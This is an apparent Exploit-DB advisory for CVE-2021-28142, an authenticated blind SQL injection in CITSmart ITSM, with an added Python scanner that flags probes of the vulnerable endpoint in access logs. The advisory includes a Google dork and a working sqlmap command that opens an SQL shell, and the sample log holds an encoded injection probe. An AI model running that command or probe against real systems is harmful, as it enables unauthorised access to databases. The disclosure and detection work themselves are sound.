
# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Date: 11/03/2021
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.28
# CVE : CVE-2021-28142

To exploit this flaw it is necessary to be authenticated.

Vulnerable URL:
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale

Vulnerable parameter: query

Sqlmap usage:
sqlmap -u "https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell

Affected versions: < 9.1.2.28
Fixed versions: >= 9.1.2.28

The vendor has acknowledged this vulnerability in ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html).
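For defenders who cannot patch to 9.1.2.28 immediately, the advisory gives enough detail to hunt for probing of this endpoint in web server logs: the injection lands in the `query` parameter of `autoCompletePortal.load`, the advisory's own prefix and suffix rely on quote and parenthesis characters, and a time-based blind attack shows up as abnormally slow responses. The scanner below is an added example, not part of the advisory or of CITSmart's product; the access-log layout it parses (client, timestamp, request line, status, bytes, response time in milliseconds) and the sample log lines are constructed assumptions, so adapt the regex to your server's actual log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory.
TARGET_PATH = "/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load"
TARGET_PARAM = "query"

# Quote and parenthesis characters (as used by the advisory's prefix/suffix) and
# database delay functions are out of place in an autocomplete search term.
SUSPICIOUS = re.compile(r"""['"()]|\b(sleep|benchmark|waitfor|pg_sleep)\b""", re.I)

# Assumed access-log layout (constructed for this example, not CITSmart's own format):
# client - - [timestamp] "METHOD url HTTP/x" status bytes response_time_ms
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<ms>\d+)$'
)

SLOW_MS = 1000  # a time-based blind probe shows up as an abnormally slow response


def analyze_line(line):
    """Return a finding dict for a suspicious request to the vulnerable endpoint, else None."""
    m = LOG_LINE.match(line.rstrip("\n"))
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    if parts.path != TARGET_PATH:
        return None
    # parse_qs percent-decodes and turns '+' into spaces, so we inspect the value the server saw
    values = parse_qs(parts.query, keep_blank_values=True).get(TARGET_PARAM, [])
    hits = [v for v in values if SUSPICIOUS.search(v)]
    if not hits:
        return None
    slow = int(m.group("ms")) >= SLOW_MS
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "query": hits,
        "response_ms": int(m.group("ms")),
        # suspicious input plus a delayed response is the signature of time-based blind SQLi
        "severity": "high" if slow else "medium",
    }


def scan(lines):
    """Run analyze_line over an iterable of log lines and keep the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f]


# Constructed sample log: a normal autocomplete call, a probe using the advisory's
# prefix/suffix that came back slowly, a quick probe with a stray quote, and an
# unrelated endpoint that must be ignored.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2021:10:00:01 +0000] "GET /citsmart/pages/smartPortal/pages/'
    'autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale HTTP/1.1" 200 512 45',
    '203.0.113.5 - - [11/Mar/2021:10:00:02 +0000] "GET /citsmart/pages/smartPortal/pages/'
    'autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query='
    'fale%27%29+AND+%28%27abc%25%27%3D%27abc HTTP/1.1" 200 512 1203',
    '203.0.113.5 - - [11/Mar/2021:10:00:03 +0000] "GET /citsmart/pages/smartPortal/pages/'
    'autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale%27 HTTP/1.1" 200 512 50',
    '198.51.100.7 - - [11/Mar/2021:10:00:04 +0000] "GET /citsmart/login?query=%27 HTTP/1.1" 200 128 30',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["severity"], finding["ip"], finding["timestamp"],
              finding["response_ms"], "ms", finding["query"])
```

Run it against a real access log with `scan(open("access.log"))`. A "high" finding (SQL metacharacters plus a slow response) from an authenticated session is worth an incident ticket; a burst of "medium" findings from one client usually means an automated scanner such as sqlmap is enumerating the parameter.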